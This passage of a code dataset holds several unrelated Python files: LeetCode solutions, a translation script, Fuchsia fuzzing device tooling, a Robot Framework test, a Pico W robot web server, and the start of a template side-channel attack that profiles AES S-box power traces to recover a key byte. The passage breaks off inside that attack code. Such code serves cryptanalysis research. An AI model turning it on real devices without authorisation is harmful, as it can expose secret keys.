5","repo_name":"xiaofanc/leetcode","sub_path":"0673-number-of-longest-increasing-subsequence.py","file_name":"0673-number-of-longest-increasing-subsequence.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2144885349","text":"import pandas as pd\nfrom joblib import Parallel, delayed\nfrom googletrans import Translator\n\ntranslator = Translator()\n\n\ndef translate(filepath, column_to_translate):\n df = pd.read_csv(filepath)\n\n for column in column_to_translate:\n translated_col = Parallel(n_jobs=8)(delayed(_translate)(i) for i in df[column].unique())\n translated_col = pd.DataFrame(translated_col, columns=[column, '{}_en'.format(column)])\n df = df.merge(translated_col, on=[column], how='left')\n df = df.drop(column, axis=1)\n df = df.rename(index=str, columns={'{}_en'.format(column): column})\n\n return df\n\n\ndef _translate(x):\n translated = x\n try:\n translated = translator.translate(x, src='ru', dest='en').text\n except Exception as e:\n # print(e)\n pass\n return x, translated\n","repo_name":"minerva-ml/open-solution-avito-demand-prediction","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"28393934933","text":"\"\"\"\n给定两个由小写字母构成的字符串 A 和 B ,\n只要我们可以通过交换 A 中的两个字母得到与 B 相等的结果,\n就返回 true ;否则返回 false 。\n示例 1:\n\n输入: A = \"ab\", B = \"ba\"\n输出: true\n示例 2:\n\n输入: A = \"ab\", B = \"ab\"\n输出: false\n示例 3:\n\n输入: A = \"aa\", B = \"aa\"\n输出: true\n示例 4:\n\n输入: A = \"aaaaaaabc\", B = \"aaaaaaacb\"\n输出: true\n示例 5:\n\n输入: A = \"\", B = \"aa\"\n输出: false\n \n\n提示:\n\n0 <= A.length <= 20000\n0 <= B.length <= 20000\nA 和 B 仅由小写字母构成。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/buddy-strings\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\n\"\"\"\n思路:\n1. 字符串长度不相等, 直接返回false\n2. 字符串相等的时候, 只要有重复的元素就返回true\n3. 
A, B字符串有不相等的两个地方, 需要查看它们交换后是否相等即可.\n\"\"\"\n\ndef buddyStrings(A, B):\n if len(A) != len(B):\n return False\n if A == B and len(set(A)) < len(A):\n return True\n dif = [(a,b) for a,b in zip(A, B) if a!=b]\n return len(dif) == 2 and dif[0] == dif[1][::-1]\n \n\nA = input(\"输入A:\")\nB = input(\"输入B:\")\nprint(buddyStrings(A, B))","repo_name":"Cheney320/LeetCode-","sub_path":"day2/859.py","file_name":"859.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"86745921554","text":"import os\nimport sys\nfrom contextlib import contextmanager\n\n\ndef tail(f, n):\n assert n >= 0\n pos, lines = n + 1, []\n\n # set file pointer to end\n\n f.seek(0, os.SEEK_END)\n\n isFileSmall = False\n\n while len(lines) <= n:\n try:\n f.seek(f.tell() - pos, os.SEEK_SET)\n except ValueError as e:\n # lines greater than file seeking size\n # seek to start\n f.seek(0, os.SEEK_SET)\n isFileSmall = True\n except IOError:\n print(\"Some problem reading/seeking the file\")\n sys.exit(-1)\n finally:\n lines = f.readlines()\n if isFileSmall:\n break\n\n pos *= 2\n\n return lines[-n:]\n\n\n@contextmanager\ndef open_potentially_compressed_file(f: str, mode: str = \"r\"):\n opfunc = open\n if f.endswith(\".gz\"):\n import gzip\n\n opfunc = gzip.open\n\n with opfunc(f, mode=mode) as fp:\n yield fp\n","repo_name":"PMCC-BioinformaticsCore/janis-assistant","sub_path":"janis_assistant/utils/fileutil.py","file_name":"fileutil.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18405098759","text":"import itertools; import math; import operator; import random; import string; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from heapq import *; import unittest; from typing import List;\ndef get_sol(): return Solution()\nclass Solution:\n def twoOutOfThree(self, nums1: List[int], nums2: List[int], nums3: List[int]) -> List[int]:\n sett1 = set(nums1)\n sett2 = set(nums2)\n sett3 = set(nums3)\n res = []\n count = Counter()\n for x in sett1: count[x]+=1\n for x in sett2: count[x]+=1\n for x in sett3: count[x]+=1\n for x in count:\n if count[x]>=2:\n res.append(x)\n return res\n\n\nclass MyTestCase(unittest.TestCase):\n def test1(self):\n nums1,nums2,nums3 = [1,1,3,2], [2,3], [3]\n Output= sorted([3,2])\n self.assertEqual(Output, sorted(get_sol().twoOutOfThree(nums1,nums2,nums3)))\n def test2(self):\n nums1,nums2,nums3 = [3,1], [2,3], [1,2]\n Output= sorted([2,3,1])\n self.assertEqual(Output, sorted(get_sol().twoOutOfThree(nums1,nums2,nums3)))\n def test3(self):\n nums1,nums2,nums3 = [1,2,2], [4,3,3], [5]\n Output= sorted([])\n self.assertEqual(Output, sorted(get_sol().twoOutOfThree(nums1,nums2,nums3)))\n # def test4(self):\n # def test5(self):\n # def test6(self):\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc2032.py","file_name":"lc2032.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13515652532","text":"import unittest\nfrom io import StringIO\n\nfrom robot.output.filelogger import FileLogger\nfrom robot.utils.asserts import assert_equal\n\n\nclass LoggerSub(FileLogger):\n\n def _get_writer(self, path):\n return StringIO()\n\n def message(self, msg):\n msg.timestamp = '2023-09-08 12:16:00.123456'\n super().message(msg)\n\n\nclass 
TestFileLogger(unittest.TestCase):\n\n def setUp(self):\n self.logger = LoggerSub('whatever', 'INFO')\n\n def test_write(self):\n self.logger.write('my message', 'INFO')\n expected = '2023-09-08 12:16:00.123456 | INFO | my message\\n'\n self._verify_message(expected)\n self.logger.write('my 2nd msg\\nwith 2 lines', 'ERROR')\n expected += '2023-09-08 12:16:00.123456 | ERROR | my 2nd msg\\nwith 2 lines\\n'\n self._verify_message(expected)\n\n def test_write_helpers(self):\n self.logger.info('my message')\n expected = '2023-09-08 12:16:00.123456 | INFO | my message\\n'\n self._verify_message(expected)\n self.logger.warn('my 2nd msg\\nwith 2 lines')\n expected += '2023-09-08 12:16:00.123456 | WARN | my 2nd msg\\nwith 2 lines\\n'\n self._verify_message(expected)\n\n def test_set_level(self):\n self.logger.write('msg', 'DEBUG')\n self._verify_message('')\n self.logger.set_level('DEBUG')\n self.logger.write('msg', 'DEBUG')\n self._verify_message('2023-09-08 12:16:00.123456 | DEBUG | msg\\n')\n\n def _verify_message(self, expected):\n assert_equal(self.logger._writer.getvalue(), expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"robotframework/robotframework","sub_path":"utest/output/test_filelogger.py","file_name":"test_filelogger.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":8521,"dataset":"github-code","pt":"21"} +{"seq_id":"1706275384","text":"# IMPORTANDO BIBLIOTECAs\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n# TRAÇANDO UM GRÁFICO\nx = np.array([1,2,3,4])\ny = x*2 # broadcasting\n\ny2 = x*x # operação indice a indice (np array * np array)\n\nplt.xlabel('Valores de X')\nplt.ylabel('Valores de Y')\n\n# s = coloca marcadores quadrado / r = faz a linha do grafico ficar pontilhada\n# linewidth = tamanho da linha / markersize = tamanho do marcador\n# plt.plot(x,y, 's:r', linewidth=3, markersize=20)\n\n# O = bolinha / G = green\n# plt.plot(x, y2, 'o--g', linewidth=3, markersize=20)\n\n''' \n OBS: pode plotar dois graficos em uma linha\n plt.plot(x,y, 's:r', x, y2, 'o--g', linewidth=3, markersize=20)\n'''\n# linha, coluna, posição\nplt.subplot(1,2,1)\nplt.plot(x, y, 's:r')\n\nplt.subplot(1,2,2)\nplt.plot(x, y2, 'o--g')\n\nplt.show()\n","repo_name":"LiviaJacklinne/INATEL-C111","sub_path":"Aula/04-Matplotlib/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43938810008","text":"import torch\nfrom . 
utils import largest_divisor\nimport matplotlib.pyplot as plt\nfrom typing import List\n\n\ndef lines_multiplot(lines: List[List[float]],\n title: str,\n y_label: str,\n x_label: str,\n save_file: str,\n multiplot_labels: List[str]):\n \"\"\"\n creates multiple lines in the same subplot.\n\n :param lines: float representations of lines to plot\n :type lines: List[List[float]]\n\n :param title: figure title\n :type title: str\n\n :param multiplot_labels: line labels\n :type multiplot_labels: List[str]\n\n :param y_label: y label\n :type y_label: str\n\n :param x_label: x label\n :type x_label: str\n\n :param save_file: name of the file in which the figure is stored\n :type save_file: str\n \"\"\"\n plt.figure(figsize=(4, 4))\n for i, line in enumerate(lines):\n plt.plot(range(len(line)), line, label=multiplot_labels[i])\n plt.title(title)\n plt.ylabel(y_label)\n plt.xlabel(x_label)\n plt.legend()\n plt.tight_layout()\n plt.ticklabel_format(useOffset=False)\n plt.savefig(save_file)\n\n\ndef images_subplot(images: List[torch.Tensor],\n title: str,\n subplot_titles: List[str],\n save_file: str):\n \"\"\"\n creates multiple subplots within one figure.\n each subplot shows an image.\n\n :param images: torch Tensors representing RGB images\n :type images: List[torch.Tensor]\n\n :param title: figure title\n :type title: str\n\n :param subplot_titles: image labels\n :type subplot_titles: List[str]\n\n :param save_file: name of the file in which the figure is stored\n :type save_file: str\n \"\"\"\n n_images = len(images)\n num_cols = largest_divisor(n=n_images)\n num_rows = n_images // num_cols\n fig, axs = plt.subplots(num_rows, num_cols, figsize=(num_cols * 4, num_rows * 4))\n plt.suptitle(title)\n if num_cols == 1:\n for i, img in enumerate(images):\n image_tensor = images[i].detach()\n image_array = image_tensor.permute(1, 2, 0).numpy()\n axs[i].imshow(image_array)\n axs[i].set_title(subplot_titles[i])\n axs[i].axis('off')\n else:\n for i, img in enumerate(images):\n row_idx = i // num_cols\n col_idx = i % num_cols\n image_tensor = images[i].detach()\n image_array = image_tensor.permute(1, 2, 0).numpy()\n axs[row_idx, col_idx].imshow(image_array)\n axs[row_idx, col_idx].set_title(subplot_titles[i])\n axs[row_idx, col_idx].axis('off')\n plt.tight_layout()\n plt.savefig(save_file)\n\n\ndef lines_subplot(lines: List[List[float]],\n title: str,\n subplot_titles: List[str],\n y_label: str,\n x_label: str,\n save_file: str):\n \"\"\"\n creates multiple subplots within one figure.\n each subplot is a line plot.\n\n :param lines: float representations of lines to plot\n :type lines: List[List[float]]\n\n :param title: figure title\n :type title: str\n\n :param subplot_titles: line labels\n :type subplot_titles: List[str]\n\n :param y_label: y label\n :type y_label: str\n\n :param x_label: x label\n :type x_label: str\n\n :param save_file: name of the file in which the figure is stored\n :type save_file: str\n \"\"\"\n n_lines = len(lines)\n n_cols = largest_divisor(n=n_lines)\n n_rows = n_lines // n_cols\n plt.figure(figsize=(n_cols * 4, n_rows * 4))\n plt.suptitle(title)\n for i in range(n_lines):\n plt.subplot(n_rows, n_cols, i + 1)\n plt.title(subplot_titles[i])\n plt.ylabel(y_label)\n plt.xlabel(x_label)\n plt.ticklabel_format(useOffset=False)\n plt.plot(range(len(lines[i])), lines[i])\n plt.tight_layout()\n 
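# tight_layout() runs before saving so the stacked subplots do not overlap;\n    # savefig() infers the image format from the save_file extension (e.g. .png).\n    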
plt.savefig(save_file)\n","repo_name":"MilanKalkenings/pypi_package","sub_path":"src/milankalkenings/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72160630454","text":"import sys\nfrom collections import deque\n\nclass Node:\n def __init__(self, index) -> None:\n self.index = index # 自分の番号 (頂点)\n self.parents = [] # 親ノードのインデックスのリスト\n self.children = [] # 子ノードのインデックスのリスト\n self.toporo = 0\n self.memo = [] # 親ノードのリスト\n \n def __repr__(self) -> str:\n return f'[Node {self.index} : toporo: {self.toporo}]'\n\n\n# def run(n,m):\ndef run():\n input = sys.stdin.readline\n n,m = map(int, input().split())\n\n nodes = []\n for i in range(n+1):\n nodes.append(Node(i))\n \n print(nodes)\n \n for _ in range(m):\n s,d = map(int, input().split())\n nodes[s].children.append(d)\n nodes[d].parents.append(s)\n nodes[d].memo.append(s)\n queue = deque()\n\n # 親ノードを持たない Node をキューに追加 (探索のスタート地点)\n for node in nodes:\n if len(node.parents) == 0:\n queue.append(node)\n \n print(queue)\n \n # トポロジカル順序を初期化\n order = 1\n\n while queue:\n node = queue.pop() # LIFO で深さ優先する\n nodes[node.index].toporo = order\n order += 1\n\n children = node.children\n for child in children:\n nodes[child].parents.remove(node.index) # \n \n if len(nodes[child].parents) == 0:\n queue.append(nodes[child])\n print(nodes)\n # Node 0 が toporo 順序の最大値 (入力例 1 なら Node 0 が toporo 5 になる) になるので、Node 0 を消す → LIFO だから Node 0 が最後まで残るから order が最大になる\n toporo_nodes = sorted(nodes, key=lambda x: x.toporo)[: -1]\n\n # dp[i+1]: トポロジカル順序 i の Node まで調べた時、その Node を徹最長経路\n dp = [0] * (n)\n for i in range(1, n):\n if len(toporo_nodes[i].memo) > 0:\n dp[i] = max([dp[j-1] for j in [nodes[k].toporo for k in toporo_nodes[i].memo]]) + 1\n \n print(max(dp))\n\n\nif __name__ == '__main__':\n # n,m = map(int, input().split())\n # run(n,m)\n run()\n\n","repo_name":"NozomiTakiguchi/atcoder","sub_path":"src/ALGORITHM/Dp/EDPC/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38500827141","text":"import network\nimport socket\nfrom time import sleep\nimport machine\nfrom machine import Pin\n\nssid = 'Ingresa el nombre de tu red WiFi'\npassword = 'Ingresa contraseña de tu red WiFi'\n\nMotor_A_Adelante = Pin(18, Pin.OUT)\nMotor_A_Atras = Pin(19, Pin.OUT)\nMotor_B_Adelante = Pin(20, Pin.OUT)\nMotor_B_Atras = Pin(21, Pin.OUT)\n\ndef adelante():\n Motor_A_Adelante.value(1)\n Motor_B_Adelante.value(1)\n Motor_A_Atras.value(0)\n Motor_B_Atras.value(0)\n \ndef atras():\n Motor_A_Adelante.value(0)\n Motor_B_Adelante.value(0)\n Motor_A_Atras.value(1)\n Motor_B_Atras.value(1)\n\ndef detener():\n Motor_A_Adelante.value(0)\n Motor_B_Adelante.value(0)\n Motor_A_Atras.value(0)\n Motor_B_Atras.value(0)\n\ndef izquierda():\n Motor_A_Adelante.value(1)\n Motor_B_Adelante.value(0)\n Motor_A_Atras.value(0)\n Motor_B_Atras.value(1)\n\ndef derecha():\n Motor_A_Adelante.value(0)\n Motor_B_Adelante.value(1)\n Motor_A_Atras.value(1)\n Motor_B_Atras.value(0)\n\n\ndetener()\n \ndef conectar():\n red = network.WLAN(network.STA_IF)\n red.active(True)\n red.connect(ssid, password)\n while red.isconnected() == False:\n print('Conectando ...')\n sleep(1)\n ip = red.ifconfig()[0]\n print(f'Conectado con IP: {ip}')\n return ip\n \ndef open_socket(ip):\n address = (ip, 80)\n connection = socket.socket()\n connection.bind(address)\n 
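# a backlog of 1 is enough here: serve() below answers one request at a time\n    # in a blocking accept/recv/send loop\n    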
connection.listen(1)\n    return connection\n\ndef pagina_web():\n    # NOTE: minimal page; the original markup did not survive extraction, so\n    # these controls are a reconstruction matching the routes handled in serve().\n    html = f\"\"\"\n    <html>\n    <head>\n    <title>Robot</title>\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n    </head>\n    <body>\n    <h1>Robot</h1>\n    <p><a href=\"/adelante?\"><button>Adelante</button></a></p>\n    <p><a href=\"/izquierda?\"><button>Izquierda</button></a>\n    <a href=\"/detener?\"><button>Detener</button></a>\n    <a href=\"/derecha?\"><button>Derecha</button></a></p>\n    <p><a href=\"/atras?\"><button>Atras</button></a></p>\n    </body>\n    </html>\n    \"\"\"\n    return str(html)\n\ndef serve(connection):\n    while True:\n        cliente = connection.accept()[0]\n        peticion = cliente.recv(1024)\n        peticion = str(peticion)\n        try:\n            peticion = peticion.split()[1]\n        except IndexError:\n            pass\n        if peticion == '/adelante?':\n            adelante()\n        elif peticion =='/izquierda?':\n            izquierda()\n        elif peticion =='/detener?':\n            detener()\n        elif peticion =='/derecha?':\n            derecha()\n        elif peticion =='/atras?':\n            atras()\n        html = pagina_web()\n        cliente.send(html)\n        cliente.close()\n\ntry:\n    ip = conectar()\n    connection = open_socket(ip)\n    serve(connection)\nexcept KeyboardInterrupt:\n    machine.reset()\n\n    \n","repo_name":"ComputadorasySensores/Capitulo75","sub_path":"picow-robot.py","file_name":"picow-robot.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"71220177014","text":"import glob\nimport os\nimport re\nimport shutil\nimport subprocess\n\nimport six\n\nfrom .host import Host\n\n\nclass Device(object):\n  \"\"\"Represents a Fuchsia device attached to a host.\n\n  This class abstracts the details of remotely running commands and\n  transferring data to and from the device.\n\n  Attributes:\n    host: A Host object representing the local platform attached to this\n      target device.\n  \"\"\"\n\n  @classmethod\n  def from_args(cls, host, args):\n    \"\"\"Constructs a Device from command line arguments.\"\"\"\n    netaddr_cmd = ['netaddr', '--fuchsia', '--nowait']\n    default_device = '{}.device'.format(host.build_dir)\n    if args.device:\n      netaddr_cmd.append(args.device)\n    elif os.path.exists(default_device):\n      with open(default_device) as f:\n        netaddr_cmd.append(f.read().strip())\n    try:\n      netaddr = host.zircon_tool(netaddr_cmd)\n    except subprocess.CalledProcessError:\n      raise RuntimeError('Unable to find device; try `fx set-device`.')\n    device = cls(host, netaddr)\n    if not host.build_dir:\n      raise Host.ConfigError('Unable to find SSH configuration.')\n    device.set_ssh_config(Host.join(host.build_dir, 'ssh-keys', 'ssh_config'))\n    return device\n\n  def __init__(self, host, addr, port=22):\n    self.host = host\n    self._addr = addr\n    self._ssh_opts = {}\n    if port != 22:\n      self._ssh_opts['p'] = [str(port)]\n\n  def set_ssh_config(self, config_file):\n    \"\"\"Sets the SSH arguments to use a config file.\"\"\"\n    if not os.path.exists(config_file):\n      raise Host.ConfigError('Unable to find SSH configuration.')\n    self._ssh_opts['F'] = [config_file]\n\n  def set_ssh_identity(self, identity_file):\n    \"\"\"Sets the SSH identity (private key) file.\"\"\"\n    if not os.path.exists(identity_file):\n      raise Host.ConfigError('Unable to find SSH identity.')\n    self._ssh_opts['i'] = [identity_file]\n\n  def set_ssh_option(self, option):\n    \"\"\"Sets SSH configuration options. Can be used multiple times.\"\"\"\n    if 'o' in self._ssh_opts:\n      self._ssh_opts['o'].append(option)\n    else:\n      self._ssh_opts['o'] = [option]\n\n  def set_ssh_verbosity(self, level):\n    \"\"\"Sets how much debugging SSH prints. Each level maps to a repeated -v\n    flag (level 2 becomes -vv); level 0 removes any previously set flag. 
Default is 0 (none), max is 3.\"\"\"\n for i in range(1, 4):\n opt = 'v' * i\n if level == i and not opt in self._ssh_opts:\n self._ssh_opts[opt] = []\n elif level != i and opt in self._ssh_opts:\n del self._ssh_opts[opt]\n\n def get_ssh_cmd(self, cmd):\n \"\"\"Returns the SSH executable and options.\"\"\"\n result = cmd[:1]\n for opt, args in six.iteritems(self._ssh_opts):\n if result[0] == 'scp' and opt == 'p':\n opt = 'P'\n if not args:\n result.append('-' + opt)\n else:\n for arg in args:\n result.append('-' + opt)\n result.append(arg)\n return result + cmd[1:]\n\n def _ssh(self, cmdline, stdout=subprocess.PIPE):\n \"\"\"Internal wrapper around _rexec that adds the ssh command and config.\n\n Don't call this directly. This method exists to be overridden in testing.\n\n Args:\n cmdline: List of command line arguments to execute on device\n stdout: Same as for subprocess.Popen\n\n Returns:\n If check was false, a subprocess.Popen object representing the running\n child process.\n\n Raises: A Process object.\n \"\"\"\n args = self.get_ssh_cmd(['ssh', self._addr] + cmdline)\n return self.host.create_process(\n args, stdout=stdout, stderr=subprocess.STDOUT)\n\n def ssh(self, cmdline, quiet=True, logfile=None):\n \"\"\"Runs a command to completion on the device.\n\n Connects to the target device and executes a shell command. Output from\n the shell command is sent to stdout, and may optionally be saved to a file\n via the POSIX utility 'tee'.\n\n Args:\n cmdline: A list of command line arguments, starting with the command to\n execute.\n logfile: An optional pathname to save a copy of the command output to. The\n output will also still be sent to stdout.\n \"\"\"\n if quiet:\n if logfile:\n with open(logfile, 'w') as f:\n return self._ssh(cmdline, stdout=f).call()\n return self._ssh(cmdline, stdout=Host.DEVNULL).call()\n\n if logfile:\n p1 = self._ssh(cmdline, stdout=subprocess.PIPE).popen()\n p2 = self.host.create_process(['tee', logfile], stdin=p1.stdout)\n return p2.check_call()\n return self._ssh(cmdline, stdout=None).call()\n\n def getpids(self):\n \"\"\"Maps names to process IDs for running fuzzers.\n\n Connects to the device and checks which fuzz targets have a matching entry\n in the component list given by 'cs'. This matches on *only* the first 32\n characters of the component manifest and package URL. This is due to 'cs'\n being limited to returning strings of length `ZX_MAX_NAME_LEN`, as defined\n in //zircon/system/public/zircon/types.h.\n\n Returns:\n A dict mapping fuzz target names to process IDs. May be empty if no\n fuzzers are running.\n \"\"\"\n p = self._ssh(['cs'], stdout=subprocess.PIPE).popen()\n out, _ = p.communicate()\n pids = {}\n for fuzzer in self.host.fuzzers:\n tgt = (fuzzer[1] + '.cmx')[:32]\n url = ('fuchsia-pkg://fuchsia.com/%s#meta' % fuzzer[0])[:32]\n for line in out.decode('utf-8').split('\\n'):\n match = re.search(tgt + r'\\[(\\d+)\\]: ' + url, line)\n if match:\n pids[fuzzer[1]] = int(match.group(1))\n return pids\n\n def ls(self, path):\n \"\"\"Maps file names to sizes for the given path.\n\n Connects to a Fuchsia device and lists the files in a directory given by\n the provided path. 
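Sizes are parsed from the size\n    column of the device's 'ls -l' output. 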
Ignore non-existent paths.\n\n Args:\n path: Absolute path to a directory on the device.\n\n Returns:\n A dict mapping file names to file sizes, or an empty dict if the path\n does not exist.\n \"\"\"\n results = {}\n try:\n p = self._ssh(['ls', '-l', path], stdout=subprocess.PIPE).popen()\n out, _ = p.communicate()\n for line in out.decode('utf-8').split('\\n'):\n # Line ~= '-rw-r--r-- 1 0 0 8192 Mar 18 22:02 some-name'\n parts = line.split()\n # When we're running ls over ssh, we may get a note about\n # \"Warning: Permanently added [address] to the list of known hosts\"\n # Don't try to treat those as file paths\n if len(parts) > 8 and 'Warning:' not in parts:\n results[' '.join(parts[8:])] = int(parts[4])\n except subprocess.CalledProcessError:\n pass\n return results\n\n def rm(self, pathname, recursive=False):\n \"\"\"Removes a file or directory from the device.\"\"\"\n args = ['rm']\n if recursive:\n args.append('-r')\n args.append(pathname)\n self.ssh(args)\n\n def _dump_log(self, args):\n \"\"\"Retrieve a syslog from the device.\"\"\"\n p = self._ssh(['log_listener', '--dump_logs', 'yes'] + args)\n return p.check_output()\n\n def _guess_pid(self):\n \"\"\"Tries to guess the fuzzer process ID from the device syslog.\n\n This will assume the last line which contained one of the strings\n '{{{reset}}}', 'libFuzzer', or 'Sanitizer' is the fuzzer process, and\n try to extract its PID.\n\n Returns:\n The PID of the process suspected to be the fuzzer, or -1 if no\n suitable candidate was found.\n \"\"\"\n out = self._dump_log(['--only', 'reset,Fuzzer,Sanitizer'])\n pid = -1\n for line in out.split(b'\\n'):\n # Log lines are like '[timestamp][pid][tid][name] data'\n parts = line.split(b'][')\n if len(parts) > 2:\n pid = int(parts[1])\n return pid\n\n def process_logs(self, logfile, guess_pid=False, retcode=0):\n \"\"\"Constructs a symbolized fuzzer log from a device.\n\n Merges the provided fuzzer log with the symbolized system log for the\n fuzzer process.\n\n Args:\n logfile: Absolute path to a fuzzer's log file.\n guess_pid: If true and the fuzzer process ID cannot be found in the\n fuzzer log, the process ID is picked from candidates in the system\n log.\n\n Returns:\n A list of the test artifacts (e.g. crashes) reported in the logs.\n \"\"\"\n pid = -1\n pid_pattern = re.compile(br'==([0-9]+)==')\n mutation_pattern = re.compile(br'^MS: [0-9]*')\n artifacts = []\n artifact_pattern = re.compile(br'Test unit written to data/(\\S*)')\n repro_pattern = re.compile(br'Running: .*')\n line_with_crash_message = None\n with open(logfile, 'rb') as log:\n with open(logfile + '.tmp', 'wb') as tmp:\n for line in log:\n # Check for a line that tells us the process ID\n match = pid_pattern.search(line)\n if match:\n line_with_crash_message = line\n pid = int(match.group(1))\n\n # Check for one of two things:\n # 1) a unit being dumped (e.g. 
a finding from a regular fuzz run)\n # 2) a nonzero return code plus a \"Running: [foo]\" message (which\n # indicates this is a *reproducer* run that has successfully crashed)\n repro_match = repro_pattern.search(line)\n match = mutation_pattern.search(line)\n if match or (repro_match and retcode):\n if pid <= 0 and guess_pid:\n pid = self._guess_pid()\n if pid > 0:\n raw = self._dump_log(['--pid', str(pid)])\n sym = self.host.symbolize(raw)\n tmp.write(b'\\n'.join(sym))\n tmp.write(b'\\n')\n\n # Check for an artifact being reported.\n match = artifact_pattern.search(line)\n if match:\n artifacts.append(match.group(1))\n\n # Echo the line\n tmp.write(line)\n\n # Clusterfuzz's stack analyzer expects the\n # `==[num]== ERROR: [SanitizerName]: [failure type]` line\n # to occur *before* the stacktrace, so make a new tempfile\n # where we insert that line at the top.\n # TODO(flowerhack): Change the log output in Fuchsia itself, s.t. the\n # ordering is correct the *first* time, and we won't have to do this\n # fix-up-the-logs dance!\n with open(logfile + '.tmp', 'rb') as tmp:\n with open(logfile, 'wb') as final:\n if line_with_crash_message:\n final.write(line_with_crash_message)\n\n shutil.copyfileobj(tmp, final)\n\n os.remove(logfile + '.tmp')\n return artifacts\n\n def _scp(self, srcs, dst):\n \"\"\"Copies `src` to `dst`.\n\n Don't call directly; use `fetch` or `store` instead.`\n\n Args:\n srcs: Local or remote paths to copy from.\n dst: Local or remote path to copy to.\n \"\"\"\n args = self.get_ssh_cmd(['scp'] + srcs + [dst])\n p = self.host.create_process(args)\n p.call()\n\n def fetch(self, data_src, host_dst):\n \"\"\"Copies `data_src` on the target to `host_dst` on the host.\"\"\"\n if not os.path.isdir(host_dst):\n raise ValueError(host_dst + ' is not a directory')\n self._scp(['[{}]:{}'.format(self._addr, data_src)], host_dst)\n\n def store(self, host_src, data_dst):\n \"\"\"Copies `host_src` on the host to `data_dst` on the target.\"\"\"\n self.ssh(['mkdir', '-p', data_dst])\n srcs = glob.glob(host_src)\n if not srcs:\n return\n self._scp(srcs, '[{}]:{}'.format(self._addr, data_dst))\n","repo_name":"JZ1324/Hi","sub_path":"src/clusterfuzz/_internal/platforms/fuchsia/util/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":11055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9787065143","text":"# Pickling and unpickling\n\nimport pickle as p\n\nshoplistfile = 'shoplist.data'\nshoplist = ['apple', 'mango', 'carrot']\n\n# Be careful: the output file and input file need to be opened in binary mode.\n# More details: https://stackoverflow.com/questions/13906623/using-pickle-dump-typeerror-must-be-str-not-bytes\n\n# Write to the file\nf = open(shoplistfile, 'wb')\np.dump(shoplist, f) # Dump the object to a file\nf.close()\n\n# Read back from the storage\nf = open(shoplistfile, 'rb')\nstoredlist = p.load(f)\nprint(storedlist)\n","repo_name":"tinylcy/snippets","sub_path":"A Byte of Python/ch12/pickling.py","file_name":"pickling.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"11799994743","text":"import numpy\nimport matplotlib.pyplot as plt\n\nfrom pca import *\nfrom file_operate import *\nfrom utils import *\n\n\nclass TA:\n '''\n An implementation of TA on 1 Byte of AES, the leak model is Hamming Weight by default.\n '''\n leak_model = None\n leak_range = None\n pois = None\n mean_matrix = None\n 
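# Template state: pois holds the selected points of interest; for each\n    # leakage class (e.g. Hamming weight 0..8 of a byte) the template is a\n    # multivariate Gaussian with mean mean_matrix[class] and covariance\n    # cov_matrix[class] over those points.\n    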
cov_matrix = None\n\n def __init__(self, traces, plain_texts, real_key, num_pois, leak_model=HW, poi_spacing=5):\n [trace_num, trace_point] = traces.shape\n self.leak_range = max(leak_model) + 1\n self.leak_model = leak_model\n self.mean_matrix = np.zeros((self.leak_range, num_pois))\n self.cov_matrix = np.zeros((self.leak_range, num_pois, num_pois))\n temp_SBOX = [SBOX[plain_texts[i] ^ real_key] for i in range(trace_num)]\n temp_lm = [leak_model[s] for s in temp_SBOX]\n # Sort traces by HW\n # Make self.leak_range blank lists - one for each Hamming weight\n temp_traces_lm = [[] for _ in range(self.leak_range)]\n # Fill them up\n for i, trace in enumerate(traces):\n temp_traces_lm[temp_lm[i]].append(trace)\n for mid in range(self.leak_range):\n assert len(temp_traces_lm[\n mid]) != 0, \"No trace with leak model value = %d, try increasing the number of traces\" % mid\n # Switch to numpy arrays\n temp_traces_lm = [np.array(temp_traces_lm[_]) for _ in range(self.leak_range)]\n # Find averages\n tempMeans = np.zeros((self.leak_range, trace_point))\n for mid in range(self.leak_range):\n tempMeans[mid] = np.average(temp_traces_lm[mid], 0)\n # Find sum of differences\n tempSumDiff = np.zeros(trace_point)\n for i in range(self.leak_range):\n for j in range(i):\n tempSumDiff += np.abs(tempMeans[i] - tempMeans[j])\n # Find POIs\n self.pois = []\n for i in range(num_pois):\n # Find the max\n nextPOI = tempSumDiff.argmax()\n self.pois.append(nextPOI)\n # Make sure we don't pick a nearby value\n\n poiMin = max(0, nextPOI - poi_spacing)\n poiMax = 